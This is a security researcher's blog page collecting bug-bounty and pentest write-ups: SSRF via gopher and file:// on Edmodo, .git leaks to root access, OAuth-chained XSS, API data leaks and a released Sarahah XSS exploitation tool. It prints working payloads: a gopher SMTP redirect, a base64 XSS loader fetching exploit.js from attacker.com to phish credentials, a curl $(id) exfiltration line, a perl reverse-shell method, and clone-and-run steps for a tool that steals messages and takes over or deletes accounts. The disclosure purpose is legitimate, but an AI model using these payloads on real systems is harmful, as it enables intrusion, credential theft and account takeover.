• Twitter
  • Facebook
  • Youtube

About me

Let me introduce myself

A bit about me

Shawar Khan is an Ethical Hacker & Security Researcher from Pakistan.

With over years of experience in cyber security, Shawar Khan identified major security flaws in world's well known companies. This includes Google, Microsoft, PayPal, Apple and many others. A huge number of Halls of Fame and Certificates were rewarded as a token of appreciation from these companies. In spare time, Shawar used to develope exploits and web-app penetration testing tools. Some of them are BruteXSS & D-TECT.


Shawar Khan

Personal info

Shawar Khan

A Web Application Penetration Tester and Security Researcher.

Skills & Things about me

Web Application
Penetration Testing
Mobile App
Penetration Testing
Exploit Writing


My latest projects

Monday, May 21, 2018

Getting read access on Edmodo Production Server by exploiting SSRF

Hey Mates!
This is Mustafa Khan, Two weeks back I was planing to hunt some bounty sites to get some $$ but had some private programs and most of them seems to be secured and most of the researchers hunted it before me so had zero luck. 😞
Since I was disappointed and got bored so I thought to retest The Great Edmodo. while scanning for subdomains I got some interesting subdomains and starting to explore it. While checking each of the subdomains I chose my target which was Edmodo.

In this writeup I am going to disclose my recent finding of Edmodo. I found an SSRF vulnerability by exploiting which i was able to gain Read-access on their production server.

While exploring their services and subdomains I came across a subdomain ‘partnerships.edmodo.com’. This domain was having a registration area where publishers can register by submitting a form. The site was basically using Wordpress CMS and I tested it accordingly but wasn’t able to exploit the CMS as it was using the latest and secure version. So I turned on my interception proxy(Burp suite) and monitored each and every request and found that while writing data to the form a POST request was being sent to the following URL:


Seems like the form-proxy.php was somehow sending data to the file ajax-check-in-db, I tried replacing ‘url’ parameters value to http://my-ip-address and I was able to get a GET request to my server! Next I tried using but that didn’t worked! So I tried using ‘localhost’ and http://localhost:22 returned the following response:


Alright, so that was a negative response, I tried to see if SMTP service was enabled so I used http://localhost:25 and got the following response:

{“status”:{“http_code”:0},”contents”:”200 pod-200279 ESMTP Postfix (Ubuntu)\r\n221 2.7.0 Error: I can break rules, too. Goodbye.\r\n”}

Bingo! I was able to grab the SMTP banner! Now I was able to do an internal port scan using this SSRF vulnerability. I used burpsuite intruder in order to find other ports by including a range of ports and had a different response for open ports. I was able to grab banners of FTP,SSH and some other services as well.

Alright, now what next?

After that i ran another burp intruder and detected different schemes being used i found many of them were enabled and the most interesting one was the Gopher. As we know SMTP can be exploited if we have Gopher protocol enabled so I tried to check if gopher is enabled and it was enabled! There were other schemes available as well such as ftp and some other.

Now the next thing was, I have to inject CRLF and new line characters and have to pass my arguments to SMTP service via Gopher protocol. Using gopher protocol we are able to communicate with these kind of services so I created a PHP file on my server having the following code:

        $commands = array(
                ‘HELLO victim.com’,
                ‘MAIL FROM: <admin@edmodo.com>’,
                ‘RCPT To: <MYEMAIL@gmail.com>’,
                ‘Subject: WOOT’,
                ‘woot woot! Edmodo PWNED 😛’,

        $payload = implode(‘%0A’, $commands);

        header(‘Location: gopher://0:25/_'.$payload);

after setting the url parameter to the path of my PHP file i was able to redirect the vulnerable application to the Gopher scheme having my payload and i was able to communicate with the SMTP service! I was able to receive email from admin@edmodo.com ! Using this I was able to send emails from their server!

Now here comes the interesting part. The ‘file’ scheme was also available using which I was able to read files on their server. I tried accessing file:///etc/hosts and I was able to get the content of hosts file:

But when I tried file:///etc/passwd it returned an Error, there might be some kind of firewall detecting the signature. Kudos to Eric! I used a ‘./‘ as Eric told me and the final Url was file:///etc/./passwd and I was able to get the content of passed file!

Now we got read access over their production server! I was able to read any file of their server plus i was able to communicate with their internal hosts, do internal port scans, make requests from server and many other things!

Bundles of thanks to the following Good friends of mine for helping me out to take this bug to the next level. {Shawar Khan, Zain Sabahat, Eric johnson}

Thursday, October 5, 2017

Remote Code Execution - From Recon to Root!

Greetings everyone! This is Shawar Khan and today i'm going to share one of my recent findings. I'll show you how proper recon can lead to code execution. Recon and information gathering is an important part of penetration testing as knowing your target gives you more areas to attack.

So, a friend of mine gave me an IP address which was having an Admin Panel for test. After pentesting the panel, i knew that it was not bypassable and every layer was properly protected. There was no info available about the IP address, so a quick file enumeration!

nothing interesting found, but a '.git' directory!

Alright, so '.git' contains a 'config' file where we can find the repository from where the files were cloned, sometimes we can find passwords for a password-protected repository in 'config'!

Unlucky... No credentials found. The next thing to check was to see if the .git directory is having directory listing or not. If there is directory listing, we are able to clone all the files include objects:
 and Yes!
and Directory Listing was enabled which means we can download all the files and can run git status to get paths of all the files available on apache. Using the following command i cloned the files:

wget -m -I .git http://IP/.git/

cloned the files and then 'git status'

found '3398' files!
Some 'xlsx' files having data of Users!

Accessed the files and got the data!

interesting that the git status command was showing files as removed but they were available. This was not the end, found an interesting file:
Backup files! One file was having entire user data and the other tar file was having the backup of all files on the web. So now i was having access to source code!

Now it was time for a code review of those files but wasn't crazy enough to review all of them as i was excited to gather some more interesting stuff. Did a quick grep to see if i can anything related to SSH:

grep /PATH/ -rnw -e 'ssh'

and i was amazed to see what i found in a PHP file:

Got SSH & Git Password! Time for SSH:

Server access with Root Privileges! That's the End ;)
Some more critical issues and another RCE was identified via code review but i guess this is the most interesting one among them.

The vulnerability was reported and the fix is now deployed.

Polish up Recon skills and you'll get what no one else could!
Good Luck and Thanks for watching. Please share if you love this write-up.

Wednesday, September 20, 2017

Exploiting multiple Self XSSes via OAuth misconfiguration

Greetings everyone this is Shawar Khan and today i am going to share one of my recent findings. Most of you have already heard about XSS attacks, basically it's an attacker where an attacker is able to execute javascript commands on a specific web application. There are some cases where an XSS vulnerability doesn't cause risk due to limited exploitation scenarios.

Recently, i've discovered some XSS vulnerabilities which were marked as Self-XSSes as they were not exploitable by a remote attacker, these were further exploited due to which the issue was accepted. I'm going to share how i was able to exploit those self XSS vulnerabilities using some techniques and chaining. Always demonstrate the attack to the company you are reporting, else it won't demonstrate the actual risk. An XSS vulnerability cause high impact if it's remotely exploitable so i will share some scenarios which i faced and will show you how i was able to make them exploitable.

Self XSS Exploitation via DropBox with OAuth Misconfiguration

So, the actual scenario was that the site was having a functionality/mechanism that allows a user to transfer files between Dropbox & the Company Account. 
  After logging in with Dropbox, the dropbox section shows all the files of Dropbox account. Obviously it shows the file names as well, what i did was i uploaded a file having the XSS payload as filename to Dropbox.
As the file name was reflecting in the dropbox section, this would execute the payload and the interesting thing is tags except img were properly filtered but failed to filter img. Blacklisting maybe?

Anyways, got the JS code executed when the file name was shown.

Code executed but nothing but a self XSS. In order to reproduce this issue the a user has to do the following steps:

  1. Upload file having payload to Dropbox
  2. Login with Dropbox account having the Payload
 Now we can't ask a user to upload a file and do that stuff. The payload only executes when the account is logged in. What if we upload the file in our dropbox account and then make a user login?

Obviously, that would do the trick!
We can't do the login CSRF but we can somehow make the user login via Oauth. First a user is sent to dropbox to authorize the application, afterwards the user is redirected to the application with a auth token. If the user is having the auth token, the user will be logged in.

After clicking the Login button a request is sent to https://www.dropbox.com/oauth2/authorize?response_type=code&client_id={Client_ID}&redirect_uri=https://site.com/path/to/api/oauth  

After allowing permissions to application, we are redirect to
https://site.com/path/to/api/oauth having an auth token and the following request is sent.

GET /path/to/api/oauth?code={TOKEN_HERE} HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.dropbox.com
Cookie: _ga=[removed]; io=[removed]; session=[removed]; session.sig=[removed]
Connection: close

The request sent back to redirect URL was not having any kind of token for validating the request which made it vulnerable to CSRF, we can make a login using that URL. So due to the misconfiguration we are able to make someone log into our dropbox account and view our files. That's it!

By sending a URL like 'https://site.com/path/to/api/oauth?code={TOKEN_HERE}'  to victim, we are able to make the victim log into our account and after login the user will be able to see our files and if our files contains the payload, it will be executed! So simply sending the URL having oauth url will trigger the XSS and that's how we made it exploitable!

and btw, who really cares about an "alert(1)"?

Demonstrated the impact by creating a phisher having the malicious credentials capturer. I used the following payload and used 'eval' and 'atob' with a base64 code to load an external '.js' file having a malicious code:

var payload1 = document.createElement('script');

Final Payload: "><img src=x onerror=eval(atob('dmFyIHBheWxvYWQxID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7CnBheWxvYWQxLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cHM6Ly9hdHRhY2tlci5jb20vZXhwbG9pdC5qcycpOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHBheWxvYWQxKTsn'))>.png

The payload loads an 'exploit.js' file which opens a trusted URL ( 'https://trusted-domain.com' ) and then replaces the page content with a phisher after 5 seconds:
sourcecode = "SOURCE CODE IN Base64";
exploitwindow = window.open('https://site.com/','','width=500,height=500');
setTimeout(function () {exploitwindow.document.write(atob(sourcecode));},5000); 

and that's it, XSSed and got the creds:

Using the same technique i was able to XSS via 5 different services like Dropbox.

If you like this write-up, Share!

Monday, September 4, 2017

Gathering employees information by capturing GUIDs

Hi everyone, this is Shawar Khan and today i am going to share one of my recent discovery in a famous tech giant. I will keep the company name private as they are not allowing any kind of disclosure related to their company so i will use REDACTED.com instead of the company domain.

So, i got an invitation to a program and started hunting it. The first thing before starting the actual test i do is to gathering information about the target, always make sure to test areas that are less explored.

Got around 2000 subdomains of the web applications by gathering information about it from different sources and by using tools like sublister. Afterwards, i performed a mass information gathering nmap script that i recently coded and i got many files having sensitive information on the subdomains but as this write-up is limited to the GUID issue so i will show you the file i got. Nmap http-enum NSE script discovered a test.html file on of of the subdomain with nmap:

It is always best to enumerate files in order to find something that the developers left on the server. Sometimes you can find functionalities in files that will give you access to password protected areas and sometimes you will get access to sensitive areas.

So, i accessed the server on port 443 and viewed test.html and got the following contents:

The file was some kind of redirection page which redirects the user to a password protected panel. It was having an input area which takes some kind of number and when submitted, redirects the user to https://subdomain.REDACTED.com/REDACTED-partner-gateway/initiate. Was not having any info about what it was made for and how it works. After checking the source i found something interesting. When the submit button is clicked, a submitForm() javascript function is executed:

and here is the javascript code that i found in the source code:

In the above code you can clearly see what the submitForm() function does. The functions grabs the value which we enter in the input field and places it in as GUID key's value in the following JSON template:

{"accountInfo":{"accountId":"REDACTED-dev1"},"campaignInfo":{},"pageInfo":{"localizedName":"Sign+In","logicalName":"Sign+In","errorMessage":"","loginMessage":"Normal+Login"},"userInfo":{"guid":"EIDM NUM HERE","language":"ENU","country":"US"}}

the whole value is base64 encoded afterwards and then it is set as the value of subportal-tracking-service cookie. So, the cookie is holding a base64 value, next what the function does is it redirects the user to https://subdomain.REDACTED.com/REDACTED-partner-gateway/initiate

After the redirection, 3 requests are sent to the server. The interesting one is the 3rd request:

POST /REDACTED-partner-gateway/loading HTTP/1.1
Host: subdomain.REDACTED.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/JSON
X-Requested-With: XMLHttpRequest
Cookie: subportal-tracking-service=eyJhY2NvdW50SW5mbyI6eyJhY2NvdW50SWQiOiJSRURBQ1RFRC1kZXYxIn0sImNhbXBhaWduSW5mbyI6e30sInBhZ2VJbmZvIjp7ImxvY2FsaXplZE5hbWUiOiJTaWduK0luIiwibG9naWNhbE5hbWUiOiJTaWduK0luIiwiZXJyb3JNZXNzYWdlIjoiIiwibG9naW5NZXNzYWdlIjoiTm9ybWFsK0xvZ2luIn0sInVzZXJJbmZvIjp7Imd1aWQiOiIxMTExMTEiLCJsYW5ndWFnZSI6IkVOVSIsImNvdW50cnkiOiJVUyJ9fQ==;
Connection: close
Content-Length: 0

a POST request is sent to a loading endpoint which returns the following response:
HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 16:16:53 GMT
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 42
Connection: close


the response is a JSON string having a 'url' key value. This is an invalid response which means if we enter an invalid GUID key, we get this response. Now here comes the interesting part, the javascript code above the submitForm() function contains multiple commented base64 strings:

String 1: eyJhY2NvdW50SW5mbyI6eyJhY2NvdW50SWQiOiJSRURBQ1RFRC1kZXYxIn0sImNhbXBhaWduSW5mbyI6e30sInBhZ2VJbmZvIjp7ImxvY2FsaXplZE5hbWUiOiJTaWduK0luIiwibG9naWNhbE5hbWUiOiJTaWduK0luIiwiZXJyb3JNZXNzYWdlIjoiIiwibG9naW5NZXNzYWdlIjoiTm9ybWFsK0xvZ2luIn0sInVzZXJJbmZvIjp7Imd1aWQiOiIyMDE0MTEyNjE3MzU3ODYiLCJsYW5ndWFnZSI6IkVOVSIsImNvdW50cnkiOiJVUyJ9fQ==

String 2: eyJhY2NvdW50SW5mbyI6eyJhY2NvdW50SWQiOiJSRURBQ1RFRC1kZXYxIn0sImNhbXBhaWduSW5mbyI6e30sInBhZ2VJbmZvIjp7ImxvY2FsaXplZE5hbWUiOiJTaWduK0luIiwibG9naWNhbE5hbWUiOiJTaWduK0luIiwiZXJyb3JNZXNzYWdlIjoiIiwibG9naW5NZXNzYWdlIjoiTm9ybWFsK0xvZ2luIn0sInVzZXJJbmZvIjp7Imd1aWQiOiIyMDE2MDYyOTA2NTI2MTEiLCJsYW5ndWFnZSI6IkVOVSIsImNvdW50cnkiOiJVUyJ9fQ==

String 3: eyJhY2NvdW50SW5mbyI6eyJhY2NvdW50SWQiOiJSRURBQ1RFRC1kZXYxIn0sImNhbXBhaWduSW5mbyI6e30sInBhZ2VJbmZvIjp7ImxvY2FsaXplZE5hbWUiOiJTaWduK0luIiwibG9naWNhbE5hbWUiOiJTaWduK0luIiwiZXJyb3JNZXNzYWdlIjoiIiwibG9naW5NZXNzYWdlIjoiTm9ybWFsK0xvZ2luIn0sInVzZXJJbmZvIjp7Imd1aWQiOiIxMTI0MzQ3Njc1MjA3MDciLCJsYW5ndWFnZSI6IkVOVSIsImNvdW50cnkiOiJVUyJ9fQ==

which are having the following JSON strings if base64 decoded:

String 1: {"accountInfo":{"accountId":"REDACTED-dev1"},"campaignInfo":{},"pageInfo":{"localizedName":"Sign+In","logicalName":"Sign+In","errorMessage":"","loginMessage":"Normal+Login"},"userInfo":{"guid":"201411261735786","language":"ENU","country":"US"}}

String 2: {"accountInfo":{"accountId":"REDACTED-dev1"},"campaignInfo":{},"pageInfo":{"localizedName":"Sign+In","logicalName":"Sign+In","errorMessage":"","loginMessage":"Normal+Login"},"userInfo":{"guid":"201606290652611","language":"ENU","country":"US"}}

String 3: {"accountInfo":{"accountId":"REDACTED-dev1"},"campaignInfo":{},"pageInfo":{"localizedName":"Sign+In","logicalName":"Sign+In","errorMessage":"","loginMessage":"Normal+Login"},"userInfo":{"guid":"112434767520707","language":"ENU","country":"US"}}

from the decoded values we got the following GUIDs:

1. 201411261735786
2. 201606290652611
3. 112434767520707

These are the GUIDs which works as unique identifier. If the cookies contains a valid employee GUID, it responds with a JSON data having all information about the specific employee. As we got the GUIDs of some emloyees we can now get their data.

We can directly use the base64 encoded strings as cookies that we found in the javascript code or we can just enter the GUID in the input field of test.html file. We will send the following POST request having a valid cookie with valid GUID inside:

POST /REDACTED-partner-gateway/loading HTTP/1.1
Host: subdomain.REDACTED.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/JSON
X-Requested-With: XMLHttpRequest
Cookie:  subportal-tracking-service=eyJhY2NvdW50SW5mbyI6eyJhY2NvdW50SWQiOiJhdXRvZGVzay1kZXYxIn0sImNhbXBhaWduSW5mbyI6e30sInBhZ2VJbmZvIjp7ImxvY2FsaXplZE5hbWUiOiJTaWduK0luIiwibG9naWNhbE5hbWUiOiJTaWduK0luIiwiZXJyb3JNZXNzYWdlIjoiIiwibG9naW5NZXNzYWdlIjoiTm9ybWFsK0xvZ2luIn0sInVzZXJJbmZvIjp7Imd1aWQiOiIyMDE2MDYyOTA2NTI2MTEiLCJsYW5ndWFnZSI6IkVOVSIsImNvdW50cnkiOiJVUyJ9fQ==; 
Connection: close
Content-Length: 0

and we will get the JSON data in response:

Then i used python to parse the data properly, and used the following code:

And got this data:

So, Thats it! Got the information, just be knowing the GUID, we can get information of the employees. The issue was reported and is under fix.

Never forget to review the source code

If you love this writeup, Share! :) 

Saturday, August 19, 2017

Sarahah XSS Exploitation Tool - Compromising Sarahah Users.

Disclaimer: This tool is built to demonstrate XSS vulnerability in Sarahah's web application that was pre-identified. I'm not responsible for any damage done using this tool as it's only built for educational purposes.

Note: Exploit Codes are included again as the Vulnerability is now Fixed.

Hello everyone, this is Shawar Khan and it's been a long time since my last write-up. Today i'm going to release one of my recently coded script that i coded for demonstrating the XSS vulnerability that was identified in Sarahah.

First i'd like to thank "Ronnie" for letting me know about the issue, you can find the article here.

The article demonstrates the XSS vulnerability in Sarahah in a proper way. According to the article, the XSS vulnerability is caused due to insecure reflection of message when new messages are loaded. New messages are not properly filtered which causes the issue. For example a user submitted a simple <script>alert(1)</script> , the payload will be executed if the message is loaded on the next page after scrolling down. 

 Sometimes an 'alert(1)' isn't enough to demonstrate :)

But wait, 
just an alert(1) isn't enough to demonstrate the issue right? Many hackers and beginners think XSS is limited to alert(1) or just a prompt dialogue. So i decided to change this concept and coded the Exploitation Script:

The script is able to perform the following actions:
  • Messages Capture
  • Email Change
  • Account Deletion

How does it works?

Basically, i've coded multiple exploits for each of the action in javascript. This python script actually injects the payload in a target account and then floods the user with around 20 messages so the payload gets into the vulnerable area and executes on scroll.

The tool submits a script tag having eval with atob in order to bypass any protection deployed. The base64 encoded exploit code executes when passed through eval. The site returns an Error if the message contains any '.' character and that is used to deny any message having a link or domain. The protection can be bypassed by encoding the payload into Base64 and passing it into atob with eval. So the template is like:


The site has implemented multiple protection mechanisms that the tool properly bypasses. The scripts loads multiple proxies and submits the exploit code from a different IP address to bypass IP based limitations. This slows down the performance but does the job.

Exploit Codes:

All the XSS exploits i've coded for Sarahah is available on my Github

Account Deletion Exploit Code

Once the exploit code is loaded into the web application, a new invisible iframe element is created which loads the account deletion page in it. Afterwards, the page is submitted using javascript which deletes the account instantly. Due to lack of Click Jacking protection, we can interact with elements inside the iframe due to which we can delete the account.

Email Change / Account Takeover Exploit Code

This is another exploit and it's high in impact it takes over user's account instantly. Once the coded is loaded the exploits loads the settings page in iframe and changes the value of email form field with the once provided by the exploit and submits the page and the email is change. Once the email is changed the user can request a password reset link to the new email and can takeover the account. This code for this is similar to the account deletion code as they works in a same way.

Account Message Read and Capture

This is the best one of these exploits, this exploit goes through all the messages and captures them. Once the code is loaded, the code goes through every page having messages at '/Messages/GetReceivedMessagePage?page='. If requested with a specific page number, returns messages in JSON object form. The response is captured and is sent to a specified logger which is hosted by an attacker. The logger reads and parses the messages and returns them in valid form.

Setting up your system before exploitation:

Modules Required  

  • requests
  • urllib3
  • urllib
  • urllib2
  • ssl
  • glob
  • cookielib
  • bs4 or BeautifulSoup

Before using, make sure you have done the followings: 

  • CORS should be enabled
  • Logger(log.php) should be publicly accessible
  • Your IP or domain where files are hosted should have SSL deployed
  • Victim should be not be an app user


Exploit in Action!

So, each of the exploit is submitted in a way the web application can deny as the code inside is base64 encoded and will not be removed. The coded is then loaded by creating a new script element having source of exploit code available on github. 

Victim's Messages captured by Sarahah XSS Exploitation Script

Generating and Injecting Payload to victim's account


The following is the video of Sarahah XSS Exploitation Tool's Demonstration:

Want the Script?

I've uploaded the script on my Github so you guys can use it. It's available Here.


$ git clone https://github.com/shawarkhanethicalhacker/Sarahah-XSS-Exploit/
$ cd Sarahah-XSS-Exploit
$ python sarahah.py

One last thing, want to protect yourself?

This XSS vulnerability affects the user when the user is using Browser. If the user is using mobile application for android or IOS, he won't be affected as it's properly protected there. So if you want to prevent yourself from getting hacked, use Sarahah's Mobile Application.

Wednesday, May 24, 2017

Pawning the Web - Disclosing top 6 findings

Hello everyone, this is Shawar Khan and today i am going to disclose some of my top 6 findings that i guess were interesting and useful. I am going to disclose these so the viewers can apply the similar methodology and techniques used in the tests. Firstly, i want to let you guys know that each flaw was reported to the vendors and company owners to prevent the risk and i am not going to mention the company name to prevent the reputation damage.

The followings are shown in the write-up:
  • Hacking the Repository and accessing the Private SMS API
  • Viewing Payment information via Insecure API
  • Hacking into the Wind Turbine Panel
  • Getting AES Key and Decrypting encrypted data
  • Pwning the server having 1 million users with ImageMagick RCE
  • Getting Ride Information of any user

These are the findings that i am going to discuss in this write-up, so lets start!

Hacking the Repository & SMS API

Before we begin, i'd like to give an overview about what was done. While pentesting a web application and a bit of enumeration i was able to get into area that was holding the repository where all source code of the web app was available. Through that i hacked into the SMS API which i will show you in a while, the SMS API was used to send SMS from a specific SMS Mask. It was actually used for sending 2FA/Activation code on mobile numbers from a special SMS Mask.

Lets being,
When pentesting an application the most important thing is the information gathering phase, we have to get as much as information about target as possible. Most of the web developers leave sensitive files on the server due to their uncommon names and stuff. Those files  are not publicly available mostly so we have to enumerate and have to detect those files. Similarly, most developers leave GIT directory( .git ) after cloning a repository. This directory holds information about GIT repo and info about all files that were uploaded or deleted. If the GIT repository requires authentication, sometimes developers leave their credentials in the config file. Similar thing happened, first i got the .git directory by enumerating folders:
.GIT Directory Found with Nmap NSE Script

Now if the .git directory is readable or having directory listing, we could simply run the following command to get all the files available in that directory:
wget -m -I .git http://www.site.com/.git/
using the above command and using the git status command we could see all files uploaded and deleted on the web app, it will give us all the structure and all hidden files but what i found was something more interesting. I found that the config file located in the .git directory was having Repository credentials, the following information was in the file:
Directory Listing in the .GIT directory

Repository Credentials Leaking in Configuration File

Now thats interesting! I got a new subdomain which was holding the repository, i could simply clone the entire web app using the git clone command But first lets visit the new subdomain where repository was hosted. By using the credentials found, i was able to access their dashboard:
Dashboard Accessed by using the Credentials found
 After accessing the dashboard, i got access to multiple repositories and i got all the source code and files and also got access to some sensitive server information like database password and other stuff. After digging into it more, i cloned the repository which i guess was having  sensitive information. The applications seems to use Laravel PHP Framework.
 after reviewing each and every file i found something interesting in the /app/Http/Controllers/Auth/ directory. I found some sensitive information in the source code of a file located there which seems to be API information and after confirmation i found 3 SMS API being used along with their credentials:
1st SMS API Information

2nd SMS API Information

3rd SMS API Information
 Finally, i found 3 SMS APIs and their credentials. 2 of them were not working as one of it was deployed in the devices they use. The 3rd API seems to be working and it was having the same username that i found in config file in the beginning of the pentest. I tried using the credentials found in the source code but it was not working as the password was wrong. Bad Luck!, i tired using the password from the config file and it worked! I guess that was the new password. I accessed the SMS API and was able to send SMS to any number with "SMS" MSISDN Mask!
SMS Sent via API with "SMS" MSISDN Mask

It wasn't only the SMS API Hack but also i found some other serious issues that i didn't mentioned in this write-up. Just imagine the risk of leaving a file publicly available, due to that 'config' file i was able to access SMS API. So that's it!

Getting Payment Information via Insecure API endpoint

so, here is another interesting discovery. Many people asked me to disclose some API issues so i decided to disclose some interesting one. In this disclosure i found an API end point where i was able to get Information like "Credit Card Number","Location","User Information" and all other information that was used in the Payment process and also i was able to get a product for free. 

Whenever you are testing for API issues, make sure to get all the end points and understand the logic and flow of the application. Once you know the application flow you will be able to detect API flaws. In in web app, a registration form should be submitted in order to get to product purchase page. Once the transaction is done, an Order/Transaction ID is sent over an insecure challenge via GET method. The order ID can be stolen easily as its not securely transfered. 

Here is how the Registration Request looks like:
Registration POST Request to Registration API end point
after the registration the user is sent to the payment page after which there is the final page for Receipt. When the payment process is completed, the receipt page sends a request to an API endpoint having the Transaction/Order Id. The API end point was:
A GET request to the endpoint above having the Order id will result in complete transaction information in JSON:

Transaction Information in JSON form

 The 'get-lead' API endpoint shows complete transaction information when a Transaction/Order ID is entered, I tried some different Order IDs that i captured and i was able to get complete information of their transaction. In the above image the transaction information was of my orderId so i used null values to hide the info.
As the information was in JSON, i coded a python script to automate the flaw and for gathering the information in a well-readable form:
Transaction information captured using Python Script

I used test information just to show you how it actually works, the real information was sensitive and it can't be shown here publicly. Just by entering an Order ID we can get a complete transaction information. Thats due to insecure 'get-lead' API endpoint.

Hacking into the Wind Turbine Panel

I was given an IP Address of a Wind Turbine Panel for penetration test. All i had to do was to infiltrate into the password protected panel which was having all information about the Wind Turbine. Accessing the IP returned a panel:
Wind Turbine Login Panel
 I tried different methods to bypass and also tried to check if it can be bypassed using SQLI but didn't worked. Sometimes SQLI,Response Tampering,Force Browsing bypasses the password protected areas. But in this case they didn't worked so i tried to understand the flow of the application that how the authentication process was done. Nothing special was found, the panel was having a QR code. I tried some QR Code reader and it redirected to a Mobile Panel. I found that there was another panel specially designed for Mobile Browsers:
The difference between the both panels was that this was fully based on JS. Each functionality was executed using Javascript. I started reading the source code of the panel and found a JS file which was handling the login process:
JS File that controls the entire Application

The 'my-app.js' file was having an entire structure of the application behind the panel, as it was based on JS we can directly call any function. Whenever a similar flow is found, i try to understand how the login is successfully forwarded, by doing a code review of the JS file i tried to understand the response of the application when a valid password is given. The 'logIn()' function is triggered when the credentials is entered, after login the site responds with a message that tells the JS application whether the login was successful or not. An IF/ELSE condition was deployed but in an insecure way, the following is the code snippet that was insecure:
Insecure Code Snippet that led to Login Bypass
An IF/ELSE condition was used in the code, if the site responds with a "usererror" or "pwderror", then it means the login was not successful and the application will execute the 'myApp.loginScreen()' which will show the login panel. If the login is successful, the site returns a message "loginSuc" and then the application executes the "allStart()" and "myApp.closeModal()" function. The first function accesses the functionalities behind the login panel and the second function closes the login panel and gives access to the dashboard. Time for fun! Lets Bypass the panel.
I used invalid credentials to get the site response:
The site responds with 'usererror' message which means the login was not successful, lets change it to a valid response:
Changed the response to 'loginSuc' to fool the application and we'll get access to the Dashboard and Boom! We Got Access to the Dashboard!
Wind Turbine Speed & Temperature Stats

Wind Turbine Energy Consumption Stats

More Stats about the Turbines
 Thats it! We accessed the Wind Turbine Panel!


Getting AES Key and Decrypting encrypted data

When pentesting an android app, its important to know how the application is communicating with the web app and without it its thought to know the communication flow. I intercepted the application traffic and found that the data sent via 'params' parameter was encrypted:
Encrypted data being sent
Not only the data being sent, but also the response was encrypted:

So, the data being sent, and the data received from the web app was encrypted. There was no way i could decrypt that data. The data was not in plain form so i was not able to understand how the application was communicating with the web app and what the webapp was responding. I tried digging up into the application and before that i decompiled the application using apktool:
apktool d application.apk
also i converted 'dex' files to 'jar' using jex2jar:
jex2jar classes.dex
jex2jar classes2.dex

After decompiling and converting the dex files to jar i tried reading the jar file using  'JD-GUI' tool which is pre-installed in kali linux for reading jar files. After checking hundreds of classes available in the 'classes_dex2jar.jar' file i found a class named 'AuthenticateParentActivity.class' which was having something interesting. 

Found the AES Key that was used for Decrypting and Encrypting the data being sent and received! Thats what we wanted and now i was able to decrypt the data being sent and received that means the communication can be read!
Data successfully decrypted using the key! The key should never be hardcoded in the application or any place that could be accessed by a user. I found some more flaws after decrypting the data but i guess you've seen the interesting part! Thats how i found the AES key and decrypted the data.

Pwning the server having 1 million users with ImageMagick RCE

So, here is one of the best RCE i found, it was found in a famous company having almost 1million users. I was able to get into their servers by exploiting the imagemagick service being used. When testing for Remote Code Execution or File Upload flaws mostly the devs miss some points at image upload areas or profile picture change areas. Similar in this case, i found an image upload area. When exploiting ImageMagick, we have to create an image having our command which will send the reverse connection when a vulnerable function is applied on the image.

But in this case, the commands were not working properly and i was not getting reverse connection so i tried executing the curl command with imagemagick exploit:
curl http://myserver/$(id)

and the command was executed! I got a response of 'id' command executed on their server in my apache logs:

The command was successfully executed that means the server was vulnerable but i need to get a fully interactive shell. I tried executing telnet and bash commands to get a shell but the reverse shell closes after 2 seconds. That's because the command stops executing once the code executes so what i did was, i created 2 files:

one file for getting the perl backdoor from my server and the other files executes the perl shell.
I have uploaded the both files in my Github repo so you guys can view:
Launch.png & Make.png

This will do each thing separately which will give full interactive shell.
After uploading each file separately, i got the interactive shell! Rooted the server and got maximum privileges, thats it! ImageMagick Exploited:


Getting Ride Information of any user

 Here is another interesting API issue that i have identified in a Car service. Every pentest starts with information gathering, by gathering information about the target i found an administrator panel. The admin panel was password protected but by gathering some information over Bing i found an API endpoint which was showing location of a ride. The logic of application is, a user requests a ride and travels to a location. The users get a special Booking Id. The API endpoint shows location where the user traveled by taking the Booking Id as input. The endpoint was similar to the following:
If a Booking Id is replaced with the number, it will show the location of the Ride taken by a user. This flaw was found by gathering information of the target using Google Dorks and Bing. Gathering Information is one of the most important phase and simple techniques can lead to serious risk. I gathering some Booking Ids so i can get some user information:

I coded an exploit for this issue and by entering Booking id the Locations is captured:

I've uploaded the exploit code to my github so you can see the code: Ride Information Gather Exploit 
Just by finding insecure APIs in the target web application we can discover interesting issues, i hope that you guys will love this.

Thanks for viewing, please share and comment if you like this write-up.


Shawar Khan
Security Researcher


    What can I do

    Web-App Penetration Testing

    Provides a complete Penetration Test against the web application in order ensure its safety.

    Android App Penetration Testing

    Provides Android Application Penetration Testing in order to make the app & secure.

    iOS App Penetration Testing

    Provides iOS Application Penetration Testing in order to make the app & secure.


    Get in touch with me